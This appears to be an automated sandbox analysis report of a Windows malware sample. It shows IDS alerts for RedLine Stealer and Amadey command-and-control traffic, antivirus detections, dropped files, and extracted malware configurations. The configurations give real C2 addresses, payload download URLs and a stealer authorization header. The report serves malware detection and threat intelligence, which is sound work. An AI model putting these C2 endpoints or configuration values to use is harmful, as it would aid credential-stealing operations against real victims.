2024-12-13T01:37:44.353023+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49738	185.81.68.147	1912	TCP
2024-12-13T01:37:44.754750+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49738	185.81.68.147	1912	TCP
2024-12-13T01:37:45.254752+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49738	185.81.68.147	1912	TCP
2024-12-13T01:37:45.633409+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49738	185.81.68.147	1912	TCP
2024-12-13T01:37:46.070832+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49738	185.81.68.147	1912	TCP
2024-12-13T01:37:46.558826+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49738	185.81.68.147	1912	TCP
2024-12-13T01:38:05.047064+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49876	185.81.68.147	1912	TCP
2024-12-13T01:38:10.649831+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49876	185.81.68.147	1912	TCP
2024-12-13T01:38:11.496837+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49876	185.81.68.147	1912	TCP
2024-12-13T01:38:12.106689+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49876	185.81.68.147	1912	TCP
2024-12-13T01:38:13.724329+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49876	185.81.68.147	1912	TCP
2024-12-13T01:38:14.163329+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49876	185.81.68.147	1912	TCP
2024-12-13T01:38:14.601349+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49876	185.81.68.147	1912	TCP
2024-12-13T01:38:15.038142+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49876	185.81.68.147	1912	TCP
2024-12-13T01:38:15.587566+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49876	185.81.68.147	1912	TCP
2024-12-13T01:38:16.246286+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49876	185.81.68.147	1912	TCP
2024-12-13T01:38:16.944208+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49876	185.81.68.147	1912	TCP
2024-12-13T01:38:17.552415+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49876	185.81.68.147	1912	TCP
2024-12-13T01:38:19.335808+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49876	185.81.68.147	1912	TCP
2024-12-13T01:38:19.775980+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49876	185.81.68.147	1912	TCP
2024-12-13T01:38:20.215536+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49876	185.81.68.147	1912	TCP
2024-12-13T01:38:20.655213+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49876	185.81.68.147	1912	TCP
2024-12-13T01:38:22.416404+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49876	185.81.68.147	1912	TCP
2024-12-13T01:38:22.858077+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49876	185.81.68.147	1912	TCP
2024-12-13T01:38:23.399506+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49876	185.81.68.147	1912	TCP
2024-12-13T01:38:23.835507+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49876	185.81.68.147	1912	TCP
2024-12-13T01:38:24.273386+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49876	185.81.68.147	1912	TCP
2024-12-13T01:38:24.713912+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49876	185.81.68.147	1912	TCP
2024-12-13T01:38:25.235281+0100	2043231	1	A Network Trojan was detected	192.168.2.5	49876	185.81.68.147	1912	TCP

ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T01:37:33.281672+0100	2046056	1	A Network Trojan was detected	185.81.68.147	1912	192.168.2.5	49738	TCP
2024-12-13T01:38:11.616615+0100	2046056	1	A Network Trojan was detected	185.81.68.147	1912	192.168.2.5	49876	TCP

ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T01:37:06.461578+0100	2019714	2	Potentially Bad Traffic	192.168.2.5	49707	185.81.68.147	80	TCP
2024-12-13T01:37:17.775120+0100	2019714	2	Potentially Bad Traffic	192.168.2.5	49711	185.81.68.147	80	TCP
2024-12-13T01:37:22.874431+0100	2019714	2	Potentially Bad Traffic	192.168.2.5	49726	185.81.68.147	80	TCP
2024-12-13T01:38:01.525345+0100	2019714	2	Potentially Bad Traffic	192.168.2.5	49867	185.81.68.147	80	TCP

ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T01:37:26.656312+0100	2046045	1	A Network Trojan was detected	192.168.2.5	49738	185.81.68.147	1912	TCP
2024-12-13T01:38:05.047064+0100	2046045	1	A Network Trojan was detected	192.168.2.5	49876	185.81.68.147	1912	TCP

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T01:37:30.835138+0100	2856147	1	A Network Trojan was detected	192.168.2.5	49752	185.81.68.148	80	TCP

ETPRO MALWARE Amadey CnC Activity M4

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T01:37:33.820737+0100	2856148	1	A Network Trojan was detected	192.168.2.5	49761	185.81.68.148	80	TCP
2024-12-13T01:37:40.305964+0100	2856148	1	A Network Trojan was detected	192.168.2.5	49791	185.81.68.148	80	TCP
2024-12-13T01:37:46.805970+0100	2856148	1	A Network Trojan was detected	192.168.2.5	49813	185.81.68.148	80	TCP
2024-12-13T01:37:52.947721+0100	2856148	1	A Network Trojan was detected	192.168.2.5	49832	185.81.68.148	80	TCP
2024-12-13T01:37:59.165288+0100	2856148	1	A Network Trojan was detected	192.168.2.5	49857	185.81.68.148	80	TCP
2024-12-13T01:38:05.257576+0100	2856148	1	A Network Trojan was detected	192.168.2.5	49877	185.81.68.148	80	TCP
2024-12-13T01:38:11.876385+0100	2856148	1	A Network Trojan was detected	192.168.2.5	49900	185.81.68.148	80	TCP
2024-12-13T01:38:17.981386+0100	2856148	1	A Network Trojan was detected	192.168.2.5	49922	185.81.68.148	80	TCP
2024-12-13T01:38:24.207994+0100	2856148	1	A Network Trojan was detected	192.168.2.5	49943	185.81.68.148	80	TCP
2024-12-13T01:38:30.823168+0100	2856148	1	A Network Trojan was detected	192.168.2.5	49962	185.81.68.148	80	TCP
2024-12-13T01:38:36.964250+0100	2856148	1	A Network Trojan was detected	192.168.2.5	49983	185.81.68.148	80	TCP
2024-12-13T01:38:43.321073+0100	2856148	1	A Network Trojan was detected	192.168.2.5	50002	185.81.68.148	80	TCP
2024-12-13T01:38:49.554536+0100	2856148	1	A Network Trojan was detected	192.168.2.5	50023	185.81.68.148	80	TCP
2024-12-13T01:38:55.885915+0100	2856148	1	A Network Trojan was detected	192.168.2.5	50041	185.81.68.148	80	TCP
2024-12-13T01:39:02.226578+0100	2856148	1	A Network Trojan was detected	192.168.2.5	50058	185.81.68.148	80	TCP
2024-12-13T01:39:08.461476+0100	2856148	1	A Network Trojan was detected	192.168.2.5	50082	185.81.68.148	80	TCP

ETPRO MALWARE Amadey CnC Activity M5

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T01:37:39.825443+0100	2856149	1	A Network Trojan was detected	192.168.2.5	49792	185.81.68.148	80	TCP

ETPRO MALWARE Amadey CnC Activity M6

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T01:37:37.541008+0100	2856150	1	A Network Trojan was detected	192.168.2.5	49780	185.81.68.148	80	TCP
2024-12-13T01:37:37.687904+0100	2856150	1	A Network Trojan was detected	192.168.2.5	49781	185.81.68.148	80	TCP

ETPRO MALWARE Amadey CnC Activity M7

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T01:37:40.683961+0100	2856151	1	A Network Trojan was detected	192.168.2.5	49793	185.81.68.148	80	TCP
2024-12-13T01:37:41.037322+0100	2856151	1	A Network Trojan was detected	192.168.2.5	49794	185.81.68.148	80	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T01:37:30.873651+0100	2803305	3	Unknown Traffic	192.168.2.5	49753	185.81.68.147	80	TCP
2024-12-13T01:37:36.578919+0100	2803305	3	Unknown Traffic	192.168.2.5	49772	185.81.68.147	80	TCP
2024-12-13T01:37:47.205200+0100	2803305	3	Unknown Traffic	192.168.2.5	49816	185.81.68.147	80	TCP
2024-12-13T01:38:01.525345+0100	2803305	3	Unknown Traffic	192.168.2.5	49867	185.81.68.147	80	TCP

ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T01:37:36.069997+0100	2855239	1	A Network Trojan was detected	192.168.2.5	49769	185.81.68.147	80	TCP
2024-12-13T01:37:36.156479+0100	2855239	1	A Network Trojan was detected	192.168.2.5	49770	185.81.68.147	80	TCP
2024-12-13T01:37:37.541008+0100	2855239	1	A Network Trojan was detected	192.168.2.5	49780	185.81.68.148	80	TCP
2024-12-13T01:37:37.687904+0100	2855239	1	A Network Trojan was detected	192.168.2.5	49781	185.81.68.148	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1	Avira URL Cloud: Label: malware
Source: http://185.81.68.147/7vhfjke3/index.php#	Avira URL Cloud: Label: malware
Source: http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1rns	Avira URL Cloud: Label: malware
Source: http://185.81.68.147/7vhfjke3/index.php?)	Avira URL Cloud: Label: malware
Source: http://185.81.68.147/7vhfjke3/index.php?(	Avira URL Cloud: Label: malware
Source: http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1Q	Avira URL Cloud: Label: malware
Source: http://185.81.68.147/gfx.exe	Avira URL Cloud: Label: malware
Source: http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1g	Avira URL Cloud: Label: malware
Source: http://185.81.68.147/7vhfjke3/index.php?scr=1	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000004.00000003.3106042420.000000000AAAB000.00000004.00000001.00020000.00000000.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.81.68.148/8Fvu5jh4DbS/index.php", "Version": "5.10", "Install Folder": "ee29ea508b", "Install File": "Gxtuum.exe"}
Source: 17.0.D7AB.tmp.ssg.exe.5c0000.0.unpack	Malware Configuration Extractor: RedLine {"C2 url": ["185.81.68.147:1912"], "Bot Id": "eewx", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}

Multi AV Scanner detection for domain / URL

Source: http://185.81.68.147/7vhfjke3/index.php6

Virustotal: Detection: 11%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\update[1].exe	ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\clip64[1].dll	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\ssg[1].exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\cred64[1].dll	ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exe	ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exe	ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\E24B.tmp.update.exe	ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	ReversingLabs: Detection: 63%

Multi AV Scanner detection for submitted file

Source: yINR7uQlPr.exe	Virustotal: Detection: 40%			Perma Link
Source: yINR7uQlPr.exe	ReversingLabs: Detection: 75%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\E24B.tmp.update.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\ssg[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\update[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: yINR7uQlPr.exe

Joe Sandbox ML: detected

Source: yINR7uQlPr.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2245746365.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2246067900.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000020.00000002.2612705692.00000219A9004000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\21\b\bin\amd64\_lzma.pdbMM source: CC11.tmp.ctx.exe, 0000000B.00000003.2240185105.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ServiceModel.pdb; source: D7AB.tmp.ssg.exe, 00000011.00000002.2576601538.0000000000B57000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\21\b\bin\amd64\_socket.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2240417074.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2241284492.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ucrtbase.pdb source: CC11.tmp.ctx.exe, 00000010.00000002.2270141203.00007FF8B83B5000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: api-ms-win-core-memory-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2241984834.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-debug-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2240794322.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\21\b\bin\amd64\_hashlib.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2240020214.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2243521311.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2244768009.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2246183677.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbat source: powershell.exe, 00000020.00000002.2612509667.00000219A8FF9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\21\b\bin\amd64\_ctypes.pdb source: CC11.tmp.ctx.exe, 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: dows\dll\mscorlib.pdb source: powershell.exe, 00000020.00000002.2612705692.00000219A9004000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-heap-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2241592467.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.pdb8 source: powershell.exe, 00000020.00000002.2607042832.00000219A8EC0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-util-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2243911711.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-synch-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2243013801.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\21\b\bin\amd64\_bz2.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2239581958.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2244627444.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2241018419.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: vcruntime140.amd64.pdbGCTL source: CC11.tmp.ctx.exe, 0000000B.00000003.2239182239.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 00000010.00000002.2270815482.00007FF8BFB9E000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2242374350.0000023FC7271000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-console-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2240577463.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2241164887.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2244255606.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdbj source: D7AB.tmp.ssg.exe, 00000011.00000002.2662161359.0000000006DC2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: D7AB.tmp.ssg.exe, 00000011.00000002.2576601538.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\21\b\bin\amd64\select.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2250744123.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-profile-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2242660001.0000023FC7271000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ucrtbase.pdbUGP source: CC11.tmp.ctx.exe, 00000010.00000002.2270141203.00007FF8B83B5000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: vcruntime140.amd64.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2239182239.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 00000010.00000002.2270815482.00007FF8BFB9E000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: api-ms-win-crt-time-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2246391912.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: softy.pdbat.6 source: powershell.exe, 00000020.00000002.2612509667.00000219A8FF9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-handle-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2241491504.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2243251482.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb8 source: powershell.exe, 00000020.00000002.2607042832.00000219A8EC0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2242215513.0000023FC7271000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2240684273.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2244077458.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ServiceModel.pdb source: D7AB.tmp.ssg.exe, 00000011.00000002.2576601538.0000000000B8F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ion.pdb} source: powershell.exe, 00000020.00000002.2602449809.00000219A8BAA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\21\b\bin\amd64\python38.pdb source: CC11.tmp.ctx.exe, 00000010.00000002.2269356516.00007FF8A87CD000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2241882128.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\21\b\bin\amd64\_lzma.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2240185105.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-math-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2245858639.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2242520362.0000023FC7271000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2242085986.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2246488809.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb- source: powershell.exe, 00000020.00000002.2612134704.00000219A8FE3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2242778373.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2243738070.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-string-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2242897832.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: powershell.exe, 00000020.00000002.2607042832.00000219A8ED5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l2-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2241382996.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2245955915.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2241786754.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2241692866.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\21\b\bin\amd64\unicodedata.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2252609502.0000023FC727C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2244947833.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-string-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2246284261.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 11_2_00007FF6900179B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	11_2_00007FF6900179B0
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 11_2_00007FF6900185A0 FindFirstFileExW,FindClose,	11_2_00007FF6900185A0
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 11_2_00007FF690030B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	11_2_00007FF690030B84
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF6900185A0 FindFirstFileExW,FindClose,	16_2_00007FF6900185A0
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF6900179B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	16_2_00007FF6900179B0
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF690030B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	16_2_00007FF690030B84
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF8B837303C FindFirstFileExW,FindNextFileW,FindClose,	16_2_00007FF8B837303C
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF8B8373280 FindFirstFileExW,FindNextFileW,FindClose,	16_2_00007FF8B8373280
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Code function: 18_2_006CF661 FindFirstFileExW,	18_2_006CF661
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 19_2_007DF661 FindFirstFileExW,	19_2_007DF661
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 20_2_007B8430 GetTempPathA,GetFileAttributesA,FindFirstFileA,FindNextFileA,FindClose,	20_2_007B8430
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 20_2_007DF661 FindFirstFileExW,	20_2_007DF661
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 29_2_6971BCEE FindFirstFileExW,	29_2_6971BCEE

Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\Videos\desktop.ini
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\Music\desktop.ini
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\OneDrive\desktop.ini
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.5:49738 -> 185.81.68.147:1912
Source: Network traffic	Suricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.5:49738 -> 185.81.68.147:1912
Source: Network traffic	Suricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 185.81.68.147:1912 -> 192.168.2.5:49738
Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:49752 -> 185.81.68.148:80
